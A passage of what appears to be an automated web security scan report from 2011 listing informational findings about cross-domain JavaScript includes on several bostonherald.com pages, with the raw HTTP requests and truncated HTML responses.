<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
<!-- // jobfind/index.tmpl
...[SNIP]...
<link rel="alternate" title="Jobfind - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/jobfind/" type="application/rss+xml">

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
   <script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>

   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<form name="newsearchform" method="get" action="http://jobfind.salary.com/salarywizard/layoutscripts/swzl_titleselect.asp" onsubmit="return gotoTitleSelect();"><script language="javascript" src="http://bostonherald.salary.com/salarywizard/utilityscripts/swzu_v4_jsfunc.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.645. http://www.bostonherald.com/jobfind/news/healthcare/view/20110128new_balance_gives_7m_for_childhood_obesity_center_at_childrens/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/jobfind/news/healthcare/view/20110128new_balance_gives_7m_for_childhood_obesity_center_at_childrens/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /jobfind/news/healthcare/view/20110128new_balance_gives_7m_for_childhood_obesity_center_at_childrens/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:03:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 37708

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.646. http://www.bostonherald.com/jobfind/news/media/view/20110128nomar_garciaparra_to_call_wednesday_games_for_espn/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/jobfind/news/media/view/20110128nomar_garciaparra_to_call_wednesday_games_for_espn/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /jobfind/news/media/view/20110128nomar_garciaparra_to_call_wednesday_games_for_espn/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:04:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 39440

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.647. http://www.bostonherald.com/jobfind/news/media/view/20110128taco_bell_fights_back_on_beef_lawsuit_with_ad_push/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/jobfind/news/media/view/20110128taco_bell_fights_back_on_beef_lawsuit_with_ad_push/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /jobfind/news/media/view/20110128taco_bell_fights_back_on_beef_lawsuit_with_ad_push/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:03:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 45299

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.648. http://www.bostonherald.com/jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/format=comments&srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/format=comments&srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:03:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 58499

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.649. http://www.bostonherald.com/jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:03:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 41900

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.650. http://www.bostonherald.com/lottery/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/lottery/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js?nc=1
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.playlottery247.com/feed/jp/topjp_fmt1.js
http://www.playlottery247.com/js/ldc_feed.js
http://www.playlottery247.com/js/usmaps/uscanada_416x302.js

Request

GET /lottery/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:11:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 35713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<link rel=STYLESHEET href="http://www.playlottery247.com/css/LS_A.css" type="text/css">
<script language="JAVASCRIPT" src="http://www.playlottery247.com/js/ldc_feed.js"></script>
<script Language="JAVASCRIPT" src="http://www.playlottery247.com/js/usmaps/uscanada_416x302.js"></script>
<script Language="JAVASCRIPT" src="http://www.playlottery247.com/feed/jp/topjp_fmt1.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.651. http://www.bostonherald.com/mediacenter/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/mediacenter/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/lightbox.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://cache.heraldinteractive.com/js/tooltips.js?fresh=45
http://edge.quantserve.com/quant.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /mediacenter/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:55:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 450904

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>Photos & Video - Boston
...[SNIP]...

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>

                            <script src="http://cache.heraldinteractive.com/js/lightbox.js" type="text/javascript"></script>
                                <script src="http://cache.heraldinteractive.com/js/tooltips.js?fresh=45" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</body>

